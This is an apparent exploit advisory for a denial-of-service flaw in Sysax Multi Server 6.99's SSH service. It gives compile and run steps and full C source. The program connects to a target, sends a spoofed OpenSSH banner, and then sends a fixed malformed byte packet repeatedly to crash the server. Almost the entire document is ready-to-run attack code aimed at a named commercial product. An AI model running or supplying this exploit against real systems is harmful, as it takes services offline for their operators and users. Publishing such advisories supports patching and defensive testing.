Headline
Sysax Multi Server 6.99 SSH Denial Of Service
Sysax Multi Server version 6.9.9 suffers from an SSH related denial of service vulnerability.
# Exploit Title: Sysax Multi Server 6.99 - SSH Denial of Service# Date: 2024-11-03# Exploit Author: Yehia Elghaly (Mrvar0x)# Vendor Homepage: https://www.sysax.com/# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi# Version: Sysax Multi Server 6.99# Tested on: Windows 10 x64#Steps --> Compile (gcc -o ssh ssh.c)#Steps --> Run (sudo ./ssh <Target IP> <Port>)#Steps --> Crash (SSH Crashed)#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <arpa/inet.h>#include <sys/socket.h>#include <netinet/tcp.h>void error_handling(const char *message) { perror(message); exit(1);}int main(int argc, char *argv[]) { if (argc != 3) { printf("Usage: %s <IP> <Port>\n", argv[0]); exit(1); } const char *host = argv[1]; int port = atoi(argv[2]); unsigned char packet[] = {0x01, 0x02, 0x03, 0x04, 0xAA, 0xBB, 0xCC, 0xDD, 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00, 0xFF, 0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF, 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08, 0xF1, 0xE2, 0xD3, 0xC4, 0xB5, 0xA6, 0x97, 0x88, 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF, 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x99, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x00, }; int sock = socket(AF_INET, SOCK_STREAM, 0); if (sock == -1) { error_handling("Socket creation failed"); } int flag = 1; setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int)); struct linger sl = {1, 0}; // Close immediately setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl)); struct sockaddr_in serv_addr; memset(&serv_addr, 0, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = inet_addr(host); serv_addr.sin_port = htons(port); if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == -1) { error_handling("Connect failed"); } const char *ssh_banner = "SSH-2.0-OpenSSH_7.1p1 Debian-5ubuntu1\r\n"; if (send(sock, ssh_banner, strlen(ssh_banner), 0) == -1) { error_handling("Failed to send SSH banner"); } usleep(100000); for (int i = 0; i < 5; ++i) { if (send(sock, packet, sizeof(packet), 0) == -1) { error_handling("Failed to send payload"); } usleep(50000); // Short delay between sends } printf("Payload sent successfully.\n"); char buffer[1024]; ssize_t bytes_received = recv(sock, buffer, sizeof(buffer) - 1, 0); if (bytes_received > 0) { buffer[bytes_received] = '\0'; printf("Received response: %s\n", buffer); } else { printf("No response received or connection closed.\n"); } close(sock); return 0;}